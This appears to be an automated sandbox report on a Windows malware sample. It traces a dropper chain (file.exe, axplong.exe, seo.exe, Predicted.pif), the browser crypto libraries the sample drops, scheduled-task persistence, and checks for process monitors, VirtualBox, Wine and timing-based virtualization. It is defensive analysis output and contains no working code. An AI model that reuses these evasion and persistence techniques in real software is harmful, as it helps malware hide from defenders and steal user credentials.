Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1916928 > 1048576

Source: file.exe

Static PE information: Raw size of iulrnrzg is bigger than: 0x100000 < 0x1a2600

Source:	Binary string: mozglue.pdbP source: Predicted.pif, 00000012.00000002.4100831968.000000006C04D000.00000002.00000001.01000000.0000000D.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.18.dr
Source:	Binary string: freebl3.pdb source: Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.18.dr
Source:	Binary string: freebl3.pdbp source: Predicted.pif, 00000012.00000002.4077397423.000000001336D000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.18.dr
Source:	Binary string: nss3.pdb@ source: Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr
Source:	Binary string: cryptosetup.pdbGCTL source: Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, JKJDBA.18.dr
Source:	Binary string: cryptosetup.pdb source: Predicted.pif, 00000012.00000002.4067119650.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, JKJDBA.18.dr
Source:	Binary string: softokn3.pdb@ source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Predicted.pif, 00000012.00000002.4091676163.000000002B12A000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.18.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Predicted.pif, 00000012.00000002.4083951639.000000001F24F000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.18.dr
Source:	Binary string: nss3.pdb source: Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr
Source:	Binary string: mozglue.pdb source: Predicted.pif, 00000012.00000002.4100831968.000000006C04D000.00000002.00000001.01000000.0000000D.sdmp, Predicted.pif, 00000012.00000002.4081016858.00000000192D6000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.18.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iulrnrzg:EW;cqwupthl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iulrnrzg:EW;cqwupthl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 1.2.axplong.exe.40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iulrnrzg:EW;cqwupthl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iulrnrzg:EW;cqwupthl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iulrnrzg:EW;cqwupthl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;iulrnrzg:EW;cqwupthl:EW;.taggant:EW;

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe

Code function: 8_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,

8_2_00405BBF

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: seo[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xf8475
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1dccae should be: 0x1df4ce
Source: file.exe	Static PE information: real checksum: 0x1dccae should be: 0x1df4ce
Source: seo.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0xf8475

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: iulrnrzg
Source: file.exe	Static PE information: section name: cqwupthl
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: iulrnrzg
Source: axplong.exe.0.dr	Static PE information: section name: cqwupthl
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.18.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.18.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.18.dr	Static PE information: section name: .didat
Source: softokn3.dll.18.dr	Static PE information: section name: .00cfg
Source: nss3.dll.18.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00228B75 push ecx; ret

18_2_00228B88

Source: file.exe	Static PE information: section name: entropy: 7.984965162992603
Source: file.exe	Static PE information: section name: iulrnrzg entropy: 7.95339645397811
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.984965162992603
Source: axplong.exe.0.dr	Static PE information: section name: iulrnrzg entropy: 7.95339645397811

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seo[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\EBGCFBGCBFHJ\JKJDBA	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\EBGCFBGCBFHJ\JKJDBA	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

File created: C:\ProgramData\EBGCFBGCBFHJ\JKJDBA

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_002859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		18_2_002859B3
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00215EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		18_2_00215EDA

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_002233B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_002233B7

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 15EB2F second address: 15EB39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE2E9231EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DEF88 second address: 2DEF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DEF93 second address: 2DEF9D instructions: 0x00000000 rdtsc 0x00000002 je 00007FE2E9231EACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2CD046 second address: 2CD04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2DE3A8 second address: 2DE3AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
